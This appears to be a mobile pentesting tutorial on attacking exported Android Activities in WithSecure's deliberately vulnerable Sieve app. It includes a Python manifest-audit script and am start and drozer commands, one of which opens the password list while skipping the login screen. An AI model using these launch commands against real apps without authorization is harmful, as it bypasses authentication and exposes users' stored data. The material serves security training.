Attacking Activities
By now, you should have analyzed the AndroidManifest.xml, and have notes of the Activity names, and if they are explicitly or implicitly exported. For this, I am using the intentionally vulnerable app Sieve, from WithSecureLabs.
Here are the Activity notes from the app:
[ACTIVITY] com.withsecure.example.sieve.activity.MainLoginActivity
Exported: true
[INTENT-FILTER]
Actions:
android.intent.action.MAIN
Categories:
android.intent.category.LAUNCHER
[ACTIVITY] com.withsecure.example.sieve.activity.FileSelectActivity
Exported: true
[ACTIVITY] com.withsecure.example.sieve.activity.PWList
Exported: true
[ACTIVITY] com.withsecure.example.sieve.activity.SettingsActivity
Exported: Not explicitly defined
[ACTIVITY] com.withsecure.example.sieve.activity.AddEntryActivity
Exported: Not explicitly defined
[ACTIVITY] com.withsecure.example.sieve.activity.ShortLoginActivity
Exported: Not explicitly defined
[ACTIVITY] com.withsecure.example.sieve.activity.WelcomeActivity
Exported: Not explicitly defined
[ACTIVITY] com.withsecure.example.sieve.activity.PINActivity
Exported: Not explicitly defined
There are 3 Activities that are explicitly exported, and the MainLoginActivity includes an intent filter.
Access Exported Activities
Attempt to start the exported activities manually, to see how they function and how we can further attack the app. Manually starting an Activity can be performed using the Activity Manager command (am).
These commands assume you are already in a shell on the Android device, most likely through adb.
Start Activities
The basic command syntax is below. There are two ways to specify the component: the full form, where the class name is fully qualified, and the shorthand form, where the class is written relative to the package id with a leading dot. I tend to use the shorthand version, but if that doesn't work then you will need to know the full syntax.
# Full command
am start -n <package-id>/<package-id>.activity.<activity-name>
# Shorthand command
am start -n <package-id>/.activity.<activity-name>
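The Activity notes listed above and the two component-name forms accepted by am start -n can both be produced from the manifest itself. The script below is an added example, not code from the original post or from the Sieve project: it parses a constructed manifest (modelled on the Sieve notes, with one extra hypothetical activity to show the implicit-export case), applies the platform rule for android:exported (explicit value wins; otherwise an intent-filter makes the component exported on targetSdk below 31, while targetSdk 31+ rejects such a manifest at install), and prints each Activity in the notes format together with the full and shorthand component names.

```python
# Added example: audit <activity> exposure from an AndroidManifest.xml and
# derive the component names that `am start -n` accepts.
# Not from the original post or the Sieve project; the manifest is constructed.
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest. ".activity.HypotheticalDeepLinkActivity" is a
# made-up name used only to show an intent-filter without android:exported.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.withsecure.example.sieve">
  <uses-sdk android:targetSdkVersion="30"/>
  <application>
    <activity android:name=".activity.MainLoginActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".activity.PWList" android:exported="true"/>
    <activity android:name="com.withsecure.example.sieve.activity.PINActivity"/>
    <activity android:name=".activity.HypotheticalDeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def qualify(package, name):
    """Expand a manifest class name to its fully qualified form.

    ".activity.PWList" and a bare "PWList" are both relative to the package;
    a dotted name without a leading dot is already fully qualified.
    """
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def exported_status(activity, target_sdk):
    """Return (exported, reason) following the platform default rule."""
    explicit = activity.get(ANDROID_NS + "exported")
    if explicit is not None:
        return explicit.lower() == "true", "explicit android:exported=\"%s\"" % explicit
    if activity.find("intent-filter") is not None:
        if target_sdk >= 31:
            reason = "intent-filter without android:exported: rejected at install on targetSdk 31+"
        else:
            reason = "intent-filter without android:exported: implicitly exported"
        return True, reason
    return False, "no android:exported and no intent-filter: private by default"


def audit_manifest(xml_text):
    """Return one dict per <activity> with exposure and am start component names."""
    root = ET.fromstring(xml_text)
    package = root.get("package")
    sdk = root.find("uses-sdk")
    target = int(sdk.get(ANDROID_NS + "targetSdkVersion", "1")) if sdk is not None else 1
    results = []
    for act in root.iter("activity"):
        fq = qualify(package, act.get(ANDROID_NS + "name"))
        exported, reason = exported_status(act, target)
        # Shorthand form is only valid when the class lives under the package id.
        short = fq[len(package):] if fq.startswith(package + ".") else fq
        results.append({
            "name": fq,
            "exported": exported,
            "explicit": act.get(ANDROID_NS + "exported"),
            "reason": reason,
            "actions": [a.get(ANDROID_NS + "name") for a in act.iter("action")],
            "categories": [c.get(ANDROID_NS + "name") for c in act.iter("category")],
            "full": "%s/%s" % (package, fq),
            "short": "%s/%s" % (package, short),
        })
    return results


def render_notes(results):
    """Render the audit in the same notes format used above."""
    lines = []
    for r in results:
        lines.append("[ACTIVITY] %s" % r["name"])
        lines.append("Exported: %s" % (r["explicit"] if r["explicit"] is not None
                                       else "Not explicitly defined (%s)" % r["reason"]))
        if r["actions"] or r["categories"]:
            lines.append("[INTENT-FILTER]")
            lines.append("Actions:")
            lines.extend("    " + a for a in r["actions"])
            lines.append("Categories:")
            lines.extend("    " + c for c in r["categories"])
    return lines


def reachable_components(results):
    """Shorthand component names any app on the device can start."""
    return [r["short"] for r in results if r["exported"]]


if __name__ == "__main__":
    audit = audit_manifest(SAMPLE_MANIFEST)
    print("\n".join(render_notes(audit)))
    for comp in reachable_components(audit):
        print("am start -n " + comp)
```

Run it over a real manifest by replacing SAMPLE_MANIFEST with the decoded AndroidManifest.xml from apktool; every component it lists as reachable is one a reviewer should be able to justify, since it can be started with no permission check at all.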
com.withsecure.example.sieve.activity.MainLoginActivity
# Activity Manager command:
oriole:/ $ am start -n com.withsecure.example.sieve/.activity.MainLoginActivity
Starting: Intent { cmp=com.withsecure.example.sieve/.activity.MainLoginActivity }
# Drozer command:
dz> run app.activity.start --component com.withsecure.example.sieve com.withsecure.example.sieve.activity.MainLoginActivity
On the device, the Sieve app will launch the MainLoginActivity, which is the screen that allows the user to input their password. Do not log in to the app. Kill the app so that it is no longer running in the background.
com.withsecure.example.sieve.activity.FileSelectActivity
# Activity Manager command:
oriole:/ $ am start -n com.withsecure.example.sieve/.activity.FileSelectActivity
Starting: Intent { cmp=com.withsecure.example.sieve/.activity.FileSelectActivity }
# Drozer command:
dz> run app.activity.start --component com.withsecure.example.sieve com.withsecure.example.sieve.activity.FileSelectActivity
com.withsecure.example.sieve.activity.PWList
# Activity Manager command:
oriole:/ $ am start -n com.withsecure.example.sieve/.activity.PWList
Starting: Intent { cmp=com.withsecure.example.sieve/.activity.PWList }
# Drozer command:
dz> run app.activity.start --component com.withsecure.example.sieve com.withsecure.example.sieve.activity.PWList
This Activity bypasses the Login screen and immediately opens the app to the Password List on the device. However, it only shows you the Service and the Username. Tapping on an entry does not reveal the actual password since the Service isn't running.